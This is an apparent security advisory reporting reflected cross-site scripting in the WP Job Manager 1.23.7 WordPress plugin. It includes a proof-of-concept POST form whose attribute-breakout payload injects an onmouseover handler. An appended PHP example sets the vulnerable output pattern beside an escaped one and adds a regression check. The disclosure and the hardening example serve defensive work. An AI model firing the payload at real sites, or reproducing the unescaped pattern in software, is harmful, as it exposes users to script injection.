Subject: Cross-Site Scripting (XSS) in WP Job Manager 1.23.7
Date: Thu, 20 Aug 2015 15:02:04 +0200

Hello,

Plugin: WP Job Manager 1.23.7 https://wordpress.org/plugins/wp-job-manager/

1. Reflected Cross-Site Scripting (XSS) 

Unauthenticated users can inject HTML/JavaScript code.

Method: POST
URL: A valid page URL that contains the [submit_job_form] shortcode
Vulnerable parameters: create_account_email, create_account_username

Example PHP callstack:
/wp-job-manager/templates/account-signin.php:42

Verification:
http://localhost/index.php/test-2/ <- page that contains [submit_job_form]
--
<form method="POST" action="http://localhost/index.php/test-2/">
<input type="text" name="create_account_username" value='" style="position:fixed;left:0;top:0;width:100%;height:100%;" onmouseover=javascript:alert(1);>' />
<input type="text" name="create_account_email" value='" style="position:fixed;left:0;top:0;width:100%;height:100%;" onmouseover=javascript:alert(1);>' />
<input type="submit" />
</form>
--


--
Regards,
Marcin Probola,
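
The following is an added example, not code from the plugin or from the advisory author. It assumes the template prints the submitted value into a double-quoted value attribute (the shape of the payload above suggests this), shows that pattern beside an attribute-encoded version, and uses a DOM parse as a regression check. The function names are hypothetical.

```php
<?php
// Added illustration; not the plugin's code. All function names are hypothetical.

// Payload copied from the verification form in the advisory.
$payload = '" style="position:fixed;left:0;top:0;width:100%;height:100%;" onmouseover=javascript:alert(1);>';

// Vulnerable pattern (assumed): request value placed in the attribute as-is.
function render_unsafe(string $name, string $value): string {
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// Hardened pattern: encode for the HTML attribute context. Inside WordPress,
// esc_attr() does this job; htmlspecialchars() keeps the example runnable
// without WordPress loaded.
function render_safe(string $name, string $value): string {
    return '<input type="text" name="' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8')
        . '" value="' . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '" />';
}

// Regression check: parse the markup and list the attribute names that end up
// on the <input>. Anything other than type/name/value means the value escaped
// its attribute.
function input_attributes(string $html): array {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // tolerate the malformed unsafe markup
    $doc->loadHTML($html);
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    $names = [];
    foreach ($input->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

foreach (['render_unsafe', 'render_safe'] as $render) {
    $attrs = input_attributes($render('create_account_username', $payload));
    $extra = array_diff($attrs, ['type', 'name', 'value']);
    printf("%-13s attributes: %-36s %s\n", $render, implode(',', $attrs),
        $extra ? 'BREAKOUT' : 'ok');
}
```

The same check applies to create_account_email, since both parameters are reported as vulnerable.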